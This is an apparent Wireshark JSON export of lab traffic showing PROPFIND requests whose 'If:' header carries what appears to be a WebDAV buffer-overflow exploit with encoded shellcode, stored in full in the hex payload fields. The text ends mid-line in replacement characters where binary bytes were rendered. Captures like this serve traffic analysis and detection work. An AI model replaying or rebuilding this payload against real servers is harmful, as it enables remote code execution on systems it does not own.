11144 lines
877 KiB
JSON
11144 lines
877 KiB
JSON
[
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.188143000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.188143000",
|
||
"frame.time_delta": "0.015730000",
|
||
"frame.time_delta_displayed": "0.000000000",
|
||
"frame.time_relative": "16.439083000",
|
||
"frame.number": "118",
|
||
"frame.len": "192",
|
||
"frame.cap_len": "192",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "178",
|
||
"ip.id": "0x0000e54c",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00004b92",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "37507",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "37507",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "32",
|
||
"tcp.len": "126",
|
||
"tcp.seq": "1",
|
||
"tcp.seq_raw": "3566265339",
|
||
"tcp.nxtseq": "127",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "78853779",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00001934",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:c9:db:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:c9:db:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309867995",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000434000",
|
||
"tcp.analysis.bytes_in_flight": "126",
|
||
"tcp.analysis.push_bytes_sent": "126"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.016164000",
|
||
"tcp.time_delta": "0.015730000"
|
||
},
|
||
"tcp.payload": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "120"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.397733000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.397733000",
|
||
"frame.time_delta": "0.000008000",
|
||
"frame.time_delta_displayed": "0.209590000",
|
||
"frame.time_relative": "16.648673000",
|
||
"frame.number": "127",
|
||
"frame.len": "351",
|
||
"frame.cap_len": "351",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "337",
|
||
"ip.id": "0x00005abe",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000d581",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "44241",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "44241",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "33",
|
||
"tcp.len": "285",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3396156268",
|
||
"tcp.nxtseq": "1734",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3682084150",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00009968",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:ad:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:ad:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868205",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000647000",
|
||
"tcp.analysis.bytes_in_flight": "1733",
|
||
"tcp.analysis.push_bytes_sent": "1733"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001016000",
|
||
"tcp.time_delta": "0.000008000"
|
||
},
|
||
"tcp.payload": "4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "126",
|
||
"tcp.segment": "127",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1733",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:41:46:52:50:57:57:42:56:51:7a:48:70:41:45:52:74:6f:50:47:4f:78:44:54:4b:59:42:47:6d:72:78:71:68:56:43:64:49:47:4d:6d:4e:44:7a:65:66:55:4d:79:53:6d:65:43:64:4b:68:46:6f:62:51:58:49:44:6b:68:67:45:70:6e:4d:65:55:6e:69:6c:6f:78:61:46:72:66:44:43:43:42:70:72:41:43:74:57:68:48:6b:72:43:56:70:68:58:41:6d:65:74:71:4a:71:78:41:54:63:6e:75:e5:91:ad:e4:89:b6:e5:a5:90:e6:a1:ae:e7:91:94:e7:9d:88:e6:91:98:e4:a9:a5:e7:9d:8b:e4:95:86:e7:91:84:e6:85:a9:e7:9d:b1:e5:89:b3:e5:81:8f:e5:89:85:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:ad:b4:e6:89:92:e6:a5:a9:e7:a9:b4:e5:89:b9:e6:bd:84:e5:81:ad:e7:a5:9a:e4:ad:b3:e6:a5:b8:e7:a5:92:e5:95:ac:e7:a5:b9:e4:bd:b3:e7:91:a1:e6:b5:a7:e6:99:93:e7:99:a1:e6:bd:8d:e4:a9:92:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6f:78:61:6d:55:76:62:6f:68:53:45:76:70:55:70:56:75:61:6b:77:47:70:53:6e:41:51:6f:4d:59:4d:73:68:71:72:76:77:77:6a:46:44:4c:72:68:70:49:66:51:6c:67:43:64:41:6c:76:77:68:72:68:43:70:57:6f:4b:58:43:67:4f:4d:6b:41:62:70:6a:42:6e:77:4c:44:64:66:43:47:63:78:43:41:79:53:68:70:76:47:45:6d:56:77:6e:63:5a:49:49:46:44:6a:67:69:6c:71:6b:47:74:e4:89:94:e7:95:8a:e4:9d:9a:e5:a5:a5:e6:99:91:e6:9d:a2:e4:b1:a5:e4:89:8b:e7:9d:b0:e5:8d:ad:e4:b5:ac:e7:99:a8:e6:a9:98:e6:99:92:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:a9:95:e4:b1:8e:e5:85:aa:e4:a9:93:e1:8f:80:e6:a0:83:e5:a9:a1:e4:85:89:e7:81:89:e6:a5:a7:e4:a5:8f:e6:a5:85:e7:a5:b4:e5:99:a5:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/AFRPWWBVQzHpAERtoPGOxDTKYBGmrxqhVCdIGMmNDzefUMySmeCdKhFobQXIDkhgEpnMeUniloxaFrfDCCBprACtWhHkrCVphXAmetqJqxATcnu<6E><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/oxamUvbohSEvpUpVuakwGpSnAQoMYMshqrvwwjFDLrhpIfQlgCdAlvwhrhCpWoKXCgOMkAbpjBnwLDdfCGcxCAyShpvGEmVwncZIIFDjgilqkGt<47><74><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFB